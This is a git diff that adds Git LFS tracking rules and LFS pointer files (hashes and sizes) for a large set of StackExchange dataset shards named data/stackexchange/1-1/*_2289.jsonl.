+data/stackexchange/1-1/829_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/82_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/830_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/831_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/832_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/833_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/834_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/835_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/836_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/837_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/838_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/839_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/83_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/840_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/841_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/842_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/843_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/844_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/845_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/846_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/847_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/848_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/849_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/84_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/850_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/851_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/852_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/853_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/854_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/855_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/856_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/857_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/858_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/859_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/85_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/860_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/861_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/862_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/863_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/864_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/865_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/866_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/867_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/868_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/869_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/86_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/870_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/871_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/872_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/873_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/874_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/875_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/876_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/877_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/878_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/879_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/87_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/880_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/881_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/882_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/883_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/884_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/885_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/886_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/887_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/888_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/889_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/88_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/890_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/891_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/892_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/893_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/894_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/895_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/896_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/897_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/898_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/899_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/89_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/8_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/900_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/901_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/902_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/903_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/904_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/905_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/906_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/907_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/908_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/909_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/90_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/910_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/911_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/912_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/913_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/914_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/915_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/916_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/917_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/918_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/919_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/91_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/920_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/921_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/922_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/923_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/924_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/925_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/926_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/927_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/928_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/929_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/92_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/930_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/931_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/932_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/933_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/934_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/935_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/936_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/937_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/938_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/939_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/93_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/940_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/941_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/942_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/943_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/944_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/945_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/946_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/947_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/948_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/949_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/94_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/950_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/951_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/952_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/953_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/954_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/955_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/956_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/957_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/958_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/959_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/95_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/960_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/961_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/962_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/963_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/964_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/965_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/966_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/967_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/968_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/969_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/96_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/970_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/971_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/972_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/973_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/974_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/975_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/976_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/977_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/978_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/979_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/97_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/980_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/981_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/982_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/983_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/984_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/985_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/986_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/987_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/988_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/989_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/98_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/990_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/991_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/992_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/993_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/994_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/995_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/996_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/997_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/998_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/999_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/99_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/9_2289.jsonl filter=lfs diff=lfs merge=lfs -text diff --git a/data/stackexchange/1-1/0_2289.jsonl b/data/stackexchange/1-1/0_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96c873c4b2d4c19a63dac01204a566373bb6cfb4 --- /dev/null +++ b/data/stackexchange/1-1/0_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ee6642fa41a2581efa4b38670a3e8e21779c848a5eb38f310c63d9e928f0df2 +size 35607549 diff --git a/data/stackexchange/1-1/1000_2289.jsonl b/data/stackexchange/1-1/1000_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..db97be61fa2d1fff710018d0168aa7fedb5843e2 --- /dev/null +++ b/data/stackexchange/1-1/1000_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8518100fab3c28c922faa695bb771c44b4ffe5c04127c3466ccb0a16b486cdd +size 35130869 diff --git a/data/stackexchange/1-1/1001_2289.jsonl b/data/stackexchange/1-1/1001_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f672f836c38df13dcf74b0c6b9efe206a65e7a70 --- /dev/null +++ b/data/stackexchange/1-1/1001_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:28235bf636fc4278ba0635f2b16706e7ef453502bfe41f567660122e5112627c +size 35147569 diff --git a/data/stackexchange/1-1/1002_2289.jsonl b/data/stackexchange/1-1/1002_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bcee4fbbc2413e2a7e65801520f2b6557bc1b70f --- /dev/null +++ b/data/stackexchange/1-1/1002_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a6fc485eb06ae5ea7b1a9a87d20da503ef96b846cdc21f8eae5d7431f3720de9 +size 35055186 diff --git a/data/stackexchange/1-1/1003_2289.jsonl b/data/stackexchange/1-1/1003_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c6d8722525bd5b0da4f7d69faafb757f6ca4641 --- /dev/null +++ b/data/stackexchange/1-1/1003_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:857d0af9d20ad9aae001715abf725e252233e38cd09ad95d1a48e41652c6c528 +size 35619521 diff --git a/data/stackexchange/1-1/1004_2289.jsonl b/data/stackexchange/1-1/1004_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6d5eefe963e8de45b24865d07914d0385acecbbc --- /dev/null +++ b/data/stackexchange/1-1/1004_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c799029ad46fb4fb0d27cbff53b0e1f18662081d122a954e6268add9f7d0c746 +size 35376973 diff --git a/data/stackexchange/1-1/1005_2289.jsonl b/data/stackexchange/1-1/1005_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95a01dc6469fc9b09d36428ff8b2bf41affcf6c7 --- /dev/null +++ b/data/stackexchange/1-1/1005_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5bfd34f292846c6bfc37187fd6689ecf436688211b38f06faede1ba52c71a4c5 +size 35152769 diff --git a/data/stackexchange/1-1/1006_2289.jsonl b/data/stackexchange/1-1/1006_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5490882eaef5ba14a9c0f4e259d8834ce67d2260 --- /dev/null +++ b/data/stackexchange/1-1/1006_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a3cdcda8fa07b8db83e87721c117a460c11ed3990c39aabfe6a6474b3bed9133 +size 35512543 diff --git 
a/data/stackexchange/1-1/1007_2289.jsonl b/data/stackexchange/1-1/1007_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c70d24c30b00e6e824e36e06a1594e9e4825bc7d --- /dev/null +++ b/data/stackexchange/1-1/1007_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fda3a1ecbd362c7b6a4bee29d7cc7946240b2b6826116beeda1e549fe557d3fa +size 34262610 diff --git a/data/stackexchange/1-1/1008_2289.jsonl b/data/stackexchange/1-1/1008_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5270030fa0324192be7c0207ffa3e03235e389af --- /dev/null +++ b/data/stackexchange/1-1/1008_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1bc498eb5959ed140a4efb335edb01c395eca346734c93f6faa90ed430311103 +size 35210300 diff --git a/data/stackexchange/1-1/1009_2289.jsonl b/data/stackexchange/1-1/1009_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..873507cbfe950213055846ecb324f6f685379e10 --- /dev/null +++ b/data/stackexchange/1-1/1009_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d899daee513727fc48021a25ba77354b25651d8a78b2307b59d70fc1074b60aa +size 34943572 diff --git a/data/stackexchange/1-1/100_2289.jsonl b/data/stackexchange/1-1/100_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8265d89019e186e117854c63ee43364a164f3b1c --- /dev/null +++ b/data/stackexchange/1-1/100_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a2de1d5701c61745422fe34a40326b72eca3c6cb3816a3bcaae5bc7bb708a89 +size 34282494 diff --git a/data/stackexchange/1-1/1010_2289.jsonl b/data/stackexchange/1-1/1010_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1144168a6eb5d462ba30b8336b33a706e0d7497 --- /dev/null +++ b/data/stackexchange/1-1/1010_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:137b9fcfc59dfa98fb8bf1cf17b361fe00706b11fc5e1863edf80b63221c3862 +size 34770499 diff --git a/data/stackexchange/1-1/1011_2289.jsonl b/data/stackexchange/1-1/1011_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f30f6b2a93fec0e39e8a539c3eff2d037e265bb --- /dev/null +++ b/data/stackexchange/1-1/1011_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6eb2c0a47ed839dcd7a9be3fa927d587afe8e8ccf987e77491f5dd406999d920 +size 35431846 diff --git a/data/stackexchange/1-1/1012_2289.jsonl b/data/stackexchange/1-1/1012_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c35f4d59790e9c08108a5e27fd7ea2cd9620d4af --- /dev/null +++ b/data/stackexchange/1-1/1012_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80c72ecae4e6e00c523c88f8ef4b19ab280c71f3fca80df38759c847d6adf04a +size 34761965 diff --git a/data/stackexchange/1-1/1013_2289.jsonl b/data/stackexchange/1-1/1013_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf7d3f939ddd4af9312c9ef9eed04710a0b41ea0 --- /dev/null +++ b/data/stackexchange/1-1/1013_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:087f85503153f0c2b450ad947cf5520109bfefcdbb4bde83f57341ad1b5b4d59 +size 35275615 diff --git a/data/stackexchange/1-1/1014_2289.jsonl b/data/stackexchange/1-1/1014_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a151175f7ff21438b8048bc72a75a7a14e81c0e5 --- /dev/null +++ 
b/data/stackexchange/1-1/1014_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:15c1d49dd26a054348ed025d3c720150add3df8f680a8fa8adbce32dd290093e +size 35277658 diff --git a/data/stackexchange/1-1/1015_2289.jsonl b/data/stackexchange/1-1/1015_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a3804ee1e77c5229115a493321c1e63e6566587e --- /dev/null +++ b/data/stackexchange/1-1/1015_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1c187720018b173ace4adc6204e9c50da2ebe12f0608411feb34cbcd60c23d45 +size 35239387 diff --git a/data/stackexchange/1-1/1016_2289.jsonl b/data/stackexchange/1-1/1016_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..26c2601acb0acd41917ecad12921cb9bafe49206 --- /dev/null +++ b/data/stackexchange/1-1/1016_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8abf76257bed54018c1ccaf56a68e101f88e348ecfb197ac0120fc6a5d56660f +size 35309781 diff --git a/data/stackexchange/1-1/1017_2289.jsonl b/data/stackexchange/1-1/1017_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25ac6024501e3da32be56abe5e6f78a6ea2f87a0 --- /dev/null +++ b/data/stackexchange/1-1/1017_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:095f6540341fc452d94d493e6bf7ab32d1302755fb522f3aff767e82de2f4a18 +size 35436783 diff --git a/data/stackexchange/1-1/1018_2289.jsonl b/data/stackexchange/1-1/1018_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d0a76ae4c829292662bff502098de5cfedf9940 --- /dev/null +++ b/data/stackexchange/1-1/1018_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7e47e63995a8fee1546dc3d1d883a3cfb2cbbf6fae6367605386c00d980c489 +size 35524178 diff --git a/data/stackexchange/1-1/1019_2289.jsonl b/data/stackexchange/1-1/1019_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c496c6ec663eed126341b188d04cd38f2a355e93 --- /dev/null +++ b/data/stackexchange/1-1/1019_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6e3abd9c6dc136180f43915656a5845e0270ef66c432aabc47ae2cec746f8eb +size 35212522 diff --git a/data/stackexchange/1-1/101_2289.jsonl b/data/stackexchange/1-1/101_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4bcc9d2df3f617c4d65a9a45f8998d47530f6f23 --- /dev/null +++ b/data/stackexchange/1-1/101_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c12302eaf4e8730ef41b63761f14893a4161c106cd38ae91b505132487e6a92b +size 33958940 diff --git a/data/stackexchange/1-1/1020_2289.jsonl b/data/stackexchange/1-1/1020_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ac1b69a90276eb31392ef30c8381e576ddbd751 --- /dev/null +++ b/data/stackexchange/1-1/1020_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12a96356b349d898ef06c3634e46af50f1be443e890506de75ff3149b9674594 +size 35779716 diff --git a/data/stackexchange/1-1/1021_2289.jsonl b/data/stackexchange/1-1/1021_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1850119bcc8c13c82bfa744e5634dd75c0a1844a --- /dev/null +++ b/data/stackexchange/1-1/1021_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:600f7b6f4dee44945c25ad3d1c0348205baae2b514e1c5b1c16b2be2dfe69dd5 +size 34850713 diff --git a/data/stackexchange/1-1/1022_2289.jsonl 
b/data/stackexchange/1-1/1022_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4f791f37fca640b157ef18720742b56042bc3e16 --- /dev/null +++ b/data/stackexchange/1-1/1022_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4043f12bfae7d8e8da0da73947204abd996c70b1d18a01f598d2209009c713c4 +size 34749622 diff --git a/data/stackexchange/1-1/1023_2289.jsonl b/data/stackexchange/1-1/1023_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1983a1c45befcb12581fa5c2913d2095a7acecf --- /dev/null +++ b/data/stackexchange/1-1/1023_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6f0e732e5d67e1a6df0043f8a9e7515d41fbc417c78f1dfab63aff76707290d6 +size 35268842 diff --git a/data/stackexchange/1-1/1024_2289.jsonl b/data/stackexchange/1-1/1024_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f5a7114a9a670f17f6063c09b8024792e0a4e9f --- /dev/null +++ b/data/stackexchange/1-1/1024_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6f531f5e911eb693e6e43c5f03ea24f090c1ab1eb6fd601d1ae18b0455e74d0e +size 35354026 diff --git a/data/stackexchange/1-1/1025_2289.jsonl b/data/stackexchange/1-1/1025_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..da11998106f9b438c287912b3f4538dfda931459 --- /dev/null +++ b/data/stackexchange/1-1/1025_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:980300660a9c8d589514d2ac8ced2df016f1a07cfaab80b3ea91d67bd9b70601 +size 34868215 diff --git a/data/stackexchange/1-1/1026_2289.jsonl b/data/stackexchange/1-1/1026_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..087f4351db650e72b120647fa9177086a9d8a7af --- /dev/null +++ b/data/stackexchange/1-1/1026_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dc0870a0f70c13efb0ee4bed2d6fe9e130fbf83aa820745d80e6e0d0bed29ee4 +size 35007474 diff --git a/data/stackexchange/1-1/1027_2289.jsonl b/data/stackexchange/1-1/1027_2289.jsonl new file mode 100644 index 